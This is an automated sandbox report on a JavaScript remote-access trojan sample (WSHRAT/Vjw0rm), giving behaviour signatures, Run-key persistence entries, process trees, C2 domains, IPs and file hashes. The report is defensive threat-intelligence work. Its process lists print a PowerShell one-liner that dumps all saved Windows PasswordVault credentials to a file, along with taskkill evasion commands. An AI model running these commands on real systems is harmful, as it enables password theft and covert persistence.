Malware Analysis Report

2025-01-18 12:21

Sample ID 221101-j548ksadfk
Target FCR22001306.js
SHA256 da581bea8917ae4b052e9978b8264b3257e06d80b2973c29e80cdf216a8640c4
Tags
vjw0rm wshrat collection persistence spyware stealer trojan worm
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

da581bea8917ae4b052e9978b8264b3257e06d80b2973c29e80cdf216a8640c4

Threat Level: Known bad

The file FCR22001306.js was found to be: Known bad.

Malicious Activity Summary

vjw0rm wshrat collection persistence spyware stealer trojan worm

WSHRAT

Vjw0rm

Nirsoft

NirSoft MailPassView

Executes dropped EXE

Blocklisted process makes network request

Drops startup file

Checks computer location settings

Reads user/profile data of web browsers

Adds Run key to start application

Accesses Microsoft Outlook accounts

Looks up external IP address via web service

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Script User-Agent

Kills process with taskkill

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-11-01 08:16

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-11-01 08:16

Reported

2022-11-01 08:18

Platform

win7-20220901-en

Max time kernel

149s

Max time network

155s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\FCR22001306.js

Signatures

Vjw0rm

trojan worm vjw0rm

WSHRAT

trojan wshrat

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cmdc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cmdc.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FCR22001306.js C:\Windows\system32\wscript.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lzwNNcWAsq.js C:\Windows\System32\wscript.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FCR22001306.js C:\Windows\system32\wscript.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lzwNNcWAsq.js C:\Windows\System32\wscript.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Users\Admin\AppData\Local\Temp\cmdc.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\software\microsoft\windows\currentversion\run C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Run\FCR22001306 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\FCR22001306.js\"" C:\Windows\system32\wscript.exe N/A
Key created \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FCR22001306 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\FCR22001306.js\"" C:\Windows\system32\wscript.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header WSHRAT|94A7BB46|RYNKSFQE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 1/11/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|94A7BB46|RYNKSFQE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 1/11/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|94A7BB46|RYNKSFQE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 1/11/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|94A7BB46|RYNKSFQE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 1/11/2022|JavaScript-v3.4|NL:Netherlands N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1168 wrote to memory of 1360 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\wscript.exe
PID 1168 wrote to memory of 1360 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\wscript.exe
PID 1168 wrote to memory of 1360 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\wscript.exe
PID 1168 wrote to memory of 1460 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1168 wrote to memory of 1460 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1168 wrote to memory of 1460 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1168 wrote to memory of 1964 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 1168 wrote to memory of 1964 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 1168 wrote to memory of 1964 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 1964 wrote to memory of 1432 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1964 wrote to memory of 1432 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1964 wrote to memory of 1432 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1168 wrote to memory of 1948 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 1168 wrote to memory of 1948 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 1168 wrote to memory of 1948 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 1948 wrote to memory of 764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1948 wrote to memory of 764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1948 wrote to memory of 764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1168 wrote to memory of 1368 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\cmdc.exe
PID 1168 wrote to memory of 1368 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\cmdc.exe
PID 1168 wrote to memory of 1368 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\cmdc.exe
PID 1168 wrote to memory of 1368 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\cmdc.exe
PID 1168 wrote to memory of 748 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 1168 wrote to memory of 748 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 1168 wrote to memory of 748 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 748 wrote to memory of 868 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 748 wrote to memory of 868 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 748 wrote to memory of 868 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1168 wrote to memory of 2008 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\cmdc.exe
PID 1168 wrote to memory of 2008 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\cmdc.exe
PID 1168 wrote to memory of 2008 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\cmdc.exe
PID 1168 wrote to memory of 2008 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\cmdc.exe
PID 1168 wrote to memory of 1692 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 1168 wrote to memory of 1692 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 1168 wrote to memory of 1692 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\FCR22001306.js

C:\Windows\System32\wscript.exe

"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\lzwNNcWAsq.js"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM cmdc.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM cmdc.exe

C:\Users\Admin\AppData\Local\Temp\cmdc.exe

"C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM cmdc.exe

C:\Users\Admin\AppData\Local\Temp\cmdc.exe

"C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Local\Temp\wshlogs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 javaautorun.duia.ro udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
NG 41.217.12.189:5465 javaautorun.duia.ro tcp
US 8.8.8.8:53 egodds.longmusic.com udp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
US 8.8.8.8:53 wshsoft.company udp
SG 194.59.164.67:80 wshsoft.company tcp
NG 41.217.12.189:5465 javaautorun.duia.ro tcp
NG 41.217.12.189:5465 javaautorun.duia.ro tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
NG 41.217.12.189:5465 javaautorun.duia.ro tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
NG 41.217.12.189:5465 javaautorun.duia.ro tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp

Files

memory/1168-54-0x000007FEFBBF1000-0x000007FEFBBF3000-memory.dmp

memory/1360-55-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\lzwNNcWAsq.js

MD5 18aa18aca1d624556d87fd1c3c8dfc4a
SHA1 45509a074cd5f5d11d507a7fe0bcb733f874e90d
SHA256 27765e27d897d45fb5cc093197a65545ed4a120130e12cc88e70f41e68788036
SHA512 80e7fcc1551290772a960b76445999f85f5cbef24cf2b860c7d8e0e7ea1a2a284e8b120a203947c2e8f2cdff13193095c00922e6f7e7cc94069e8846bad4554a

memory/1460-58-0x0000000000000000-mapping.dmp

memory/1460-60-0x000007FEF3840000-0x000007FEF4263000-memory.dmp

memory/1460-62-0x00000000027D4000-0x00000000027D7000-memory.dmp

memory/1460-61-0x000007FEF2650000-0x000007FEF31AD000-memory.dmp

memory/1460-63-0x000000001B720000-0x000000001BA1F000-memory.dmp

memory/1460-64-0x00000000027D4000-0x00000000027D7000-memory.dmp

memory/1460-65-0x00000000027DB000-0x00000000027FA000-memory.dmp

memory/1964-66-0x0000000000000000-mapping.dmp

memory/1432-67-0x0000000000000000-mapping.dmp

memory/1948-68-0x0000000000000000-mapping.dmp

memory/764-69-0x0000000000000000-mapping.dmp

memory/1368-70-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\cmdc.exe

MD5 54e8ded7b148a13d3363ac7b33f6eb06
SHA1 63dcbe2db9cc14564eb84d5e953f2f9f5c54acd9
SHA256 400b411a9bffd687c5e74f51d43b7dc92cdb8d5ca9f674456b75a5d37587d342
SHA512 bf6d047bb55150b2369bdd7dfea9c815894af2e05e5b45f2eedf67d5d6a9569189ee495870fddf334a173a4beed62d2a08807c000d4c47339ac76b760b4ae349

memory/1368-72-0x00000000760E1000-0x00000000760E3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cmdc.cfg

MD5 70e69155b8080b5db35191ab8426d084
SHA1 383deaaee90ce71b28b0a6e22124e77aa1cccf8b
SHA256 104e0212403148a018258ef005a64ec73f0a148dbee230cb5c91dd691d03aefe
SHA512 c718c69454e4d9bcac24c918bf4c7f05ab93910b8a4701bd1dc914a9ca13dffe5f083f30881b5796d239c11be2f8b3e38a7e2ac7dcabc3d9810f59d9228bf342

memory/748-74-0x0000000000000000-mapping.dmp

memory/868-75-0x0000000000000000-mapping.dmp

memory/2008-76-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\cmdc.exe

MD5 54e8ded7b148a13d3363ac7b33f6eb06
SHA1 63dcbe2db9cc14564eb84d5e953f2f9f5c54acd9
SHA256 400b411a9bffd687c5e74f51d43b7dc92cdb8d5ca9f674456b75a5d37587d342
SHA512 bf6d047bb55150b2369bdd7dfea9c815894af2e05e5b45f2eedf67d5d6a9569189ee495870fddf334a173a4beed62d2a08807c000d4c47339ac76b760b4ae349

memory/1692-79-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-11-01 08:16

Reported

2022-11-01 08:18

Platform

win10v2004-20220812-en

Max time kernel

71s

Max time network

152s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\FCR22001306.js

Signatures

Vjw0rm

trojan worm vjw0rm

WSHRAT

trojan wshrat

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FCR22001306.js C:\Windows\system32\wscript.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FCR22001306.js C:\Windows\system32\wscript.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lzwNNcWAsq.js C:\Windows\System32\wscript.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lzwNNcWAsq.js C:\Windows\System32\wscript.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\software\microsoft\windows\currentversion\run C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FCR22001306 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\FCR22001306.js\"" C:\Windows\system32\wscript.exe N/A
Key created \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FCR22001306 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\FCR22001306.js\"" C:\Windows\system32\wscript.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header WSHRAT|18024990|TMKNGOMU|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/11/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|18024990|TMKNGOMU|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/11/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|18024990|TMKNGOMU|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/11/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|18024990|TMKNGOMU|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/11/2022|JavaScript-v3.4|NL:Netherlands N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1128 wrote to memory of 4380 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\wscript.exe
PID 1128 wrote to memory of 4380 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\wscript.exe

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\FCR22001306.js

C:\Windows\System32\wscript.exe

"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\lzwNNcWAsq.js"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM cmdc.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM cmdc.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe

C:\Users\Admin\AppData\Local\Temp\cmdc.exe

"C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Local\Temp\wshlogs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 f.7.6.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 javaautorun.duia.ro udp
US 208.95.112.1:80 ip-api.com tcp
NG 41.217.12.189:5465 javaautorun.duia.ro tcp
US 8.8.8.8:53 egodds.longmusic.com udp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
US 8.8.8.8:53 wshsoft.company udp
SG 194.59.164.67:80 wshsoft.company tcp
NG 41.217.12.189:5465 javaautorun.duia.ro tcp
GB 51.132.193.104:443 tcp
NG 41.217.12.189:5465 javaautorun.duia.ro tcp
NL 87.248.202.1:80 tcp
NL 87.248.202.1:80 tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
NG 41.217.12.189:5465 javaautorun.duia.ro tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
NG 41.217.12.189:5465 javaautorun.duia.ro tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
NG 41.217.12.189:5465 javaautorun.duia.ro tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp

Files

memory/4380-132-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\lzwNNcWAsq.js

MD5 18aa18aca1d624556d87fd1c3c8dfc4a
SHA1 45509a074cd5f5d11d507a7fe0bcb733f874e90d
SHA256 27765e27d897d45fb5cc093197a65545ed4a120130e12cc88e70f41e68788036
SHA512 80e7fcc1551290772a960b76445999f85f5cbef24cf2b860c7d8e0e7ea1a2a284e8b120a203947c2e8f2cdff13193095c00922e6f7e7cc94069e8846bad4554a

memory/2336-134-0x0000000000000000-mapping.dmp

memory/2336-135-0x000002147B220000-0x000002147B242000-memory.dmp

memory/2336-136-0x000002147B250000-0x000002147B25A000-memory.dmp

memory/2336-137-0x00007FFAD8B90000-0x00007FFAD9651000-memory.dmp

memory/2336-138-0x000002147CB80000-0x000002147CB88000-memory.dmp

memory/2336-139-0x00007FFAD8B90000-0x00007FFAD9651000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 c416c12d1b2b1da8c8655e393b544362
SHA1 fb1a43cd8e1c556c2d25f361f42a21293c29e447
SHA256 0600d59103840dff210778179fdfba904dcb737a4bfdb35384608698c86ea046
SHA512 cb6d3636be4330aa2fd577c3636d0b7165f92ee817e98f21180ba0c918eb76f4e38f025086593a0e508234ca981cfec2c53482b0e9cc0acfa885fefbdf89913c

memory/3196-141-0x0000000000000000-mapping.dmp

memory/4952-142-0x0000000000000000-mapping.dmp

memory/1680-144-0x0000000000000000-mapping.dmp

memory/732-143-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\cmdc.exe

MD5 54e8ded7b148a13d3363ac7b33f6eb06
SHA1 63dcbe2db9cc14564eb84d5e953f2f9f5c54acd9
SHA256 400b411a9bffd687c5e74f51d43b7dc92cdb8d5ca9f674456b75a5d37587d342
SHA512 bf6d047bb55150b2369bdd7dfea9c815894af2e05e5b45f2eedf67d5d6a9569189ee495870fddf334a173a4beed62d2a08807c000d4c47339ac76b760b4ae349

memory/4024-145-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\cmdc.exe

MD5 54e8ded7b148a13d3363ac7b33f6eb06
SHA1 63dcbe2db9cc14564eb84d5e953f2f9f5c54acd9
SHA256 400b411a9bffd687c5e74f51d43b7dc92cdb8d5ca9f674456b75a5d37587d342
SHA512 bf6d047bb55150b2369bdd7dfea9c815894af2e05e5b45f2eedf67d5d6a9569189ee495870fddf334a173a4beed62d2a08807c000d4c47339ac76b760b4ae349

C:\Users\Admin\AppData\Local\Temp\cmdc.cfg

MD5 70e69155b8080b5db35191ab8426d084
SHA1 383deaaee90ce71b28b0a6e22124e77aa1cccf8b
SHA256 104e0212403148a018258ef005a64ec73f0a148dbee230cb5c91dd691d03aefe
SHA512 c718c69454e4d9bcac24c918bf4c7f05ab93910b8a4701bd1dc914a9ca13dffe5f083f30881b5796d239c11be2f8b3e38a7e2ac7dcabc3d9810f59d9228bf342

memory/3236-149-0x0000000000000000-mapping.dmp